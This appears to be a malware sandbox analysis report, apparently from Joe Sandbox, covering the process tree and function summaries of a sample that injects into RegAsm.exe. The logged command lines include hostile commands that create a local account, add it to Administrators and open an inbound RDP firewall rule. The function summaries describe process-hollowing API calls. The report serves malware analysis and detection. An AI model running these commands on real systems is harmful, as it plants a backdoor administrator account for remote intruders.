Commandline:	C:\Windows\system32\net1 user RDPUser_2490c46d ToN8BxpWb7YJ /add
Imagebase:	0x2d0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup
Imagebase:	0xee0000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup
Imagebase:	0x2d0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Imagebase:	0x15c0000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup "Administrators" RDPUser_2490c46d /add
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup "Administrators" RDPUser_2490c46d /add
Imagebase:	0xee0000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup "Administrators" RDPUser_2490c46d /add
Imagebase:	0x2d0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	33.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	33.3%
Total number of Nodes:	21
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02AF2131 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02AF20A3,02AF2093), ref: 02AF22A0
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02AF22B3
Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 02AF22D1
ReadProcessMemory.KERNELBASE(0000009C,?,02AF20E7,00000004,00000000), ref: 02AF22F5
VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 02AF2320
WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 02AF2378
WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 02AF23C3
WriteProcessMemory.KERNELBASE(0000009C,-00000008,?,00000004,00000000), ref: 02AF2401
Wow64SetThreadContext.KERNEL32(000000A0,02AD0000), ref: 02AF243D
ResumeThread.KERNELBASE(000000A0), ref: 02AF244C

Strings

TerminateProcess, xrefs: 02AF232F
ress, xrefs: 02AF21BB
ReadProcessMemory, xrefs: 02AF221E
GetThreadContext, xrefs: 02AF220B
ResumeThread, xrefs: 02AF226D
CreateProcessA, xrefs: 02AF21E5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02AF229F
SetThreadContext, xrefs: 02AF2257
Load, xrefs: 02AF216F
VirtualAllocEx, xrefs: 02AF2231
GetP, xrefs: 02AF21B3
VirtualAlloc, xrefs: 02AF21F8
aryA, xrefs: 02AF2177
WriteProcessMemory, xrefs: 02AF2244

Memory Dump Source

Source File: 00000000.00000002.1435506263.0000000002AF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2af1000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 21abfb8c7f104d890244c42e390847deb808fe4a48e00aa8c132a80025de0a05
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 94B1E67664024AAFDB60CFA8CC80BDA77A5FF88714F158564EA0CAB341D774FA41CB94

Function 00D00C40 Relevance: .3, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1435142414.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad35b0dc470f021847a4fd4ca6c0a27fad03d404da487c76a042f56a06623c6b
Instruction ID: 119e1431bc595657601a8cf9bed2c46352c4fda8760f3dce4df26d6fee48906a
Opcode Fuzzy Hash: ad35b0dc470f021847a4fd4ca6c0a27fad03d404da487c76a042f56a06623c6b
Instruction Fuzzy Hash: CDD17D71A042599FCB15CFA8C9807ECFFF2AF48314F288569E859E7285C734AD41CBA4

Function 00D01218 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00D012A0

Memory Dump Source

Source File: 00000000.00000002.1435142414.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 08fb00384750e6a3a6853089d5795855b22057723c875e664e23d93a63ee0734
Instruction ID: 73a174ace79e7edbf8fd28b4fa405e006391770a100fbf41d5a69f779beb6d81
Opcode Fuzzy Hash: 08fb00384750e6a3a6853089d5795855b22057723c875e664e23d93a63ee0734
Instruction Fuzzy Hash: 8E2102B58002499FDB10DFAAC981BEEBBF4FF48310F50881AE959A7250C7755904CFA1

Function 00D01220 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00D012A0

Memory Dump Source

Source File: 00000000.00000002.1435142414.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 660f1ff0ba4476c1373562c5efd17f03800669da973315f58482a5c80618a1e4
Instruction ID: 95350017845562eb6d89def06d4de8fa10fe312f6bdd453dfbf4985e8d7c24e6
Opcode Fuzzy Hash: 660f1ff0ba4476c1373562c5efd17f03800669da973315f58482a5c80618a1e4
Instruction Fuzzy Hash: 062102B58002499FDB10DFAAC881BDEBBF4FF48310F50842AE919A3240C7756904CBA5

Analysis Process: RegAsm.exePID: 2828, Parent PID: 2064COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75550000,004172CA), ref: 00418964
GetProcAddress.KERNEL32 ref: 0041897B
GetProcAddress.KERNEL32 ref: 00418992
GetProcAddress.KERNEL32 ref: 004189A9
GetProcAddress.KERNEL32 ref: 004189C0
GetProcAddress.KERNEL32 ref: 004189D7
GetProcAddress.KERNEL32 ref: 004189EE
GetProcAddress.KERNEL32 ref: 00418A05
GetProcAddress.KERNEL32 ref: 00418A1C
GetProcAddress.KERNEL32 ref: 00418A33
GetProcAddress.KERNEL32 ref: 00418A4A
GetProcAddress.KERNEL32 ref: 00418A61
GetProcAddress.KERNEL32 ref: 00418A78
GetProcAddress.KERNEL32 ref: 00418A8F
GetProcAddress.KERNEL32 ref: 00418AA6
GetProcAddress.KERNEL32 ref: 00418ABD
GetProcAddress.KERNEL32 ref: 00418AD4
GetProcAddress.KERNEL32 ref: 00418AEB
GetProcAddress.KERNEL32 ref: 00418B02
GetProcAddress.KERNEL32 ref: 00418B19
GetProcAddress.KERNEL32 ref: 00418B30
GetProcAddress.KERNEL32 ref: 00418B47
GetProcAddress.KERNEL32 ref: 00418B5E
GetProcAddress.KERNEL32 ref: 00418B75
GetProcAddress.KERNEL32 ref: 00418B8C
GetProcAddress.KERNEL32 ref: 00418BA3
GetProcAddress.KERNEL32 ref: 00418BBA
GetProcAddress.KERNEL32 ref: 00418BD1
GetProcAddress.KERNEL32 ref: 00418BE8
GetProcAddress.KERNEL32 ref: 00418BFF
GetProcAddress.KERNEL32 ref: 00418C16
GetProcAddress.KERNEL32 ref: 00418C2D
GetProcAddress.KERNEL32 ref: 00418C44
GetProcAddress.KERNEL32 ref: 00418C5B
GetProcAddress.KERNEL32 ref: 00418C72
GetProcAddress.KERNEL32 ref: 00418C89
GetProcAddress.KERNEL32 ref: 00418CA0
GetProcAddress.KERNEL32 ref: 00418CB7
GetProcAddress.KERNEL32 ref: 00418CCE
GetProcAddress.KERNEL32 ref: 00418CE5
GetProcAddress.KERNEL32 ref: 00418CFC
GetProcAddress.KERNEL32 ref: 00418D13
GetProcAddress.KERNEL32 ref: 00418D2A
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418D40
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418D56
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418D6C
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418D82
GetProcAddress.KERNEL32(ResumeThread), ref: 00418D98
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418DAE
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418DC4
LoadLibraryA.KERNEL32(004172CA), ref: 00418DD5
LoadLibraryA.KERNEL32 ref: 00418DE6
LoadLibraryA.KERNEL32 ref: 00418DF7
LoadLibraryA.KERNEL32 ref: 00418E08
LoadLibraryA.KERNEL32 ref: 00418E19
LoadLibraryA.KERNEL32 ref: 00418E2A
LoadLibraryA.KERNEL32 ref: 00418E3B
LoadLibraryA.KERNEL32 ref: 00418E4C
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418E5C
GetProcAddress.KERNEL32(75750000), ref: 00418E77
GetProcAddress.KERNEL32 ref: 00418E8E
GetProcAddress.KERNEL32 ref: 00418EA5
GetProcAddress.KERNEL32 ref: 00418EBC
GetProcAddress.KERNEL32 ref: 00418ED3
GetProcAddress.KERNEL32(73AB0000), ref: 00418EF2
GetProcAddress.KERNEL32 ref: 00418F09
GetProcAddress.KERNEL32 ref: 00418F20
GetProcAddress.KERNEL32 ref: 00418F37
GetProcAddress.KERNEL32 ref: 00418F4E
GetProcAddress.KERNEL32 ref: 00418F65
GetProcAddress.KERNEL32 ref: 00418F7C
GetProcAddress.KERNEL32 ref: 00418F93
GetProcAddress.KERNEL32(757E0000), ref: 00418FAE
GetProcAddress.KERNEL32 ref: 00418FC5
GetProcAddress.KERNEL32 ref: 00418FDC
GetProcAddress.KERNEL32 ref: 00418FF3
GetProcAddress.KERNEL32 ref: 0041900A
GetProcAddress.KERNEL32(758D0000), ref: 00419029
GetProcAddress.KERNEL32 ref: 00419040
GetProcAddress.KERNEL32 ref: 00419057
GetProcAddress.KERNEL32 ref: 0041906E
GetProcAddress.KERNEL32 ref: 00419085
GetProcAddress.KERNEL32 ref: 0041909C
GetProcAddress.KERNEL32(76BE0000), ref: 004190BB
GetProcAddress.KERNEL32 ref: 004190D2
GetProcAddress.KERNEL32 ref: 004190E9
GetProcAddress.KERNEL32 ref: 00419100
GetProcAddress.KERNEL32 ref: 00419117
GetProcAddress.KERNEL32 ref: 0041912E
GetProcAddress.KERNEL32 ref: 00419145
GetProcAddress.KERNEL32 ref: 0041915C
GetProcAddress.KERNEL32 ref: 00419173
GetProcAddress.KERNEL32(75670000), ref: 0041918E
GetProcAddress.KERNEL32 ref: 004191A5
GetProcAddress.KERNEL32 ref: 004191BC
GetProcAddress.KERNEL32 ref: 004191D3
GetProcAddress.KERNEL32 ref: 004191EA
GetProcAddress.KERNEL32(759D0000), ref: 00419205
GetProcAddress.KERNEL32 ref: 0041921C
GetProcAddress.KERNEL32(76D80000), ref: 00419237
GetProcAddress.KERNEL32 ref: 0041924E
GetProcAddress.KERNEL32(6F7E0000), ref: 0041926D
GetProcAddress.KERNEL32 ref: 00419284
GetProcAddress.KERNEL32 ref: 0041929B
GetProcAddress.KERNEL32 ref: 004192B2
GetProcAddress.KERNEL32 ref: 004192C9
GetProcAddress.KERNEL32 ref: 004192E0
GetProcAddress.KERNEL32 ref: 004192F7
GetProcAddress.KERNEL32 ref: 0041930E
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419324
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041933A
GetProcAddress.KERNEL32(75480000), ref: 00419355
GetProcAddress.KERNEL32 ref: 0041936C
GetProcAddress.KERNEL32 ref: 00419383
GetProcAddress.KERNEL32 ref: 0041939A
GetProcAddress.KERNEL32(753B0000), ref: 004193B5
GetProcAddress.KERNEL32(6F510000), ref: 004193D0
GetProcAddress.KERNEL32 ref: 004193E7
GetProcAddress.KERNEL32 ref: 004193FE
GetProcAddress.KERNEL32 ref: 00419415
GetProcAddress.KERNEL32(6CA00000,SymMatchString), ref: 0041942F

Strings

WriteProcessMemory, xrefs: 00418D9E
GetThreadContext, xrefs: 00418D46
InternetSetOptionA, xrefs: 0041932A
dbghelp.dll, xrefs: 00418E52
HttpQueryInfoA, xrefs: 00419314
ResumeThread, xrefs: 00418D88
SetThreadContext, xrefs: 00418DB4
CreateProcessA, xrefs: 00418D30
SymMatchString, xrefs: 00419429
VirtualAllocEx, xrefs: 00418D72
ReadProcessMemory, xrefs: 00418D5C

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

Function 00414CC8 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414D1C
FindFirstFileA.KERNEL32(?,?), ref: 00414D33
_memset.LIBCMT ref: 00414D4F
_memset.LIBCMT ref: 00414D60
StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
wsprintfA.USER32 ref: 00414DC2
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
wsprintfA.USER32 ref: 00414DFF
wsprintfA.USER32 ref: 00414E16

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181

_memset.LIBCMT ref: 00414E28
lstrcatA.KERNEL32(?,?), ref: 00414E3D
strtok_s.MSVCRT ref: 00414E82
_memset.LIBCMT ref: 00414E94
lstrcatA.KERNEL32(?,?), ref: 00414EA9
strtok_s.MSVCRT ref: 00414EC2
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
strtok_s.MSVCRT ref: 00414FE7
FindNextFileA.KERNELBASE(?,?), ref: 00415105
FindClose.KERNEL32(?), ref: 00415125

Strings

%s\*.*, xrefs: 00414D10
%s\%s, xrefs: 00414E10
%s\%s, xrefs: 00414DBC
%s\%s\%s, xrefs: 00414DF9

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2867719434-332874205
Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

